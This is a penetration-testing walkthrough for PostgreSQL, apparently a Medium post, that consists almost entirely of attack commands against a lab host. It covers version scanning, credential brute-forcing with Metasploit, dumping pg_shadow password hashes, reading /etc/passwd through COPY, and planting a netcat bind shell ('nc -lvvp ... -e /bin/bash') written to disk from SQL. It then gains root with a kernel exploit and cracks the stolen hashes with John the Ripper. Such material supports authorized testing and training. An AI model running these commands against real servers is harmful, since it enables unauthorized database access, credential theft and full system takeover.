A Penetration Tester’s Guide to PostgreSQL

Discovery and Version Fingerprinting

nmap -sV 192.168.100.11 -p 5432
PostgreSQL — Version Identification via Nmap
auxiliary/scanner/postgres/postgres_version
PostgreSQL — Version Identification

Discovery of Database Credentials

auxiliary/scanner/postgres/postgres_login
PostgreSQL — Discovery of Database Credentials

Database Access

psql -h 192.168.100.11 -U postgres
PostgreSQL — Database Access
  • Enumeration of Existing Databases
  • Enumeration of Database Users
  • Enumeration of Database Tables
  • Retrieving Table Contents
  • Retrieving Database Passwords
  • Dumping Database Contents
postgres-# \l
postgres-# \du
template1=# \dt
template1=# SELECT * FROM users;
postgres-# SELECT usename, passwd FROM pg_shadow;
pg_dump --host=192.168.100.11 --username=postgres --password --dbname=template1 --table='users' -f output_pgdump
PostgreSQL — List Existing Databases
PostgreSQL — List Database Users
PostgreSQL — List Existing Tables
PostgreSQL — Retrieving Database Passwords
PostgreSQL — Dumping Database Contents
auxiliary/admin/postgres/postgres_sql
auxiliary/scanner/postgres/postgres_hashdump
PostgreSQL — Database Enumeration via Metasploit
Metasploit — Retrieve Postgres Server Hashes
Metasploit — Executing PostgreSQL Commands

Command Execution

postgres=# select pg_ls_dir('./');
PostgreSQL — Directory Listing
postgres=# select pg_read_file('PG_VERSION', 0, 200);
PostgreSQL — Reading Server Side Files
postgres-# CREATE TABLE temp(t TEXT);
postgres-# COPY temp FROM '/etc/passwd';
postgres-# SELECT * FROM temp limit 1 offset 0;
PostgreSQL — Reading Local Files
auxiliary/admin/postgres/postgres_readfile
PostgreSQL — Reading Local Files via Metasploit
postgres=# CREATE TABLE pentestlab (t TEXT);
postgres=# INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash');
postgres=# SELECT * FROM pentestlab;
postgres=# COPY pentestlab(t) TO '/tmp/pentestlab';
PostgreSQL — Write File on the Host
chmod +x pentestlab
./pentestlab
Stat Local Listener
nc -vn 192.168.100.11 2346
python -c "import pty;pty.spawn('/bin/bash')"
PostgreSQL — Connect to Backdoor
exploit/linux/postgres/postgres_payload
PostgreSQL — Code Execution

Privilege Escalation

user@metasploitable:/# uname -a
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Searching Linux Kernel Exploits
Compile the Exploit and Retrieve PID of netlink
#!/bin/bash
nc -lvvp 2345 -e /bin/bash
Create the run File into the tmp directory
chmod +x /tmp/run
nc -vn 192.168.100.11 2345
python -c "import pty;pty.spawn('/bin/bash')"
Receive the connection with Netcat
Metasploit Linux Privilege Escalation — netlink
Elevated Meterpreter Session — Root Privileges
Examining the Shadow File
john /root/Desktop/password.txt
john --show /root/Desktop/password.txt
Cracked Hashes

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

…How I aced the 6 Free Oracle Cloud Infrastructure certifications

Exploring Paging3 — Part 1

Accident Lawyer Sandy Utah

accident lawyer sandy utah

Make the Easy Thing the Right Thing

VisSched: An Auction based Scheduler for Vision Workloads on Heterogeneous Processors

General Scheduling Setup where N workloads compete amongst themselves to gain a scheduling quantum on K resources

Power BI Report Level Measure behind the scenes

Turn your Ruby on Rails REST API to GraphQL using Hasura Actions

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
david hayter

david hayter

More from Medium

im shahin tehrani neshat all of my smart contract has been hacked how can i stop it twitter …

Illumination Walkthrough— Hack the Box

Space Heroes CTF[All Web Challenges Writeup]

Good Game — HTB(write up)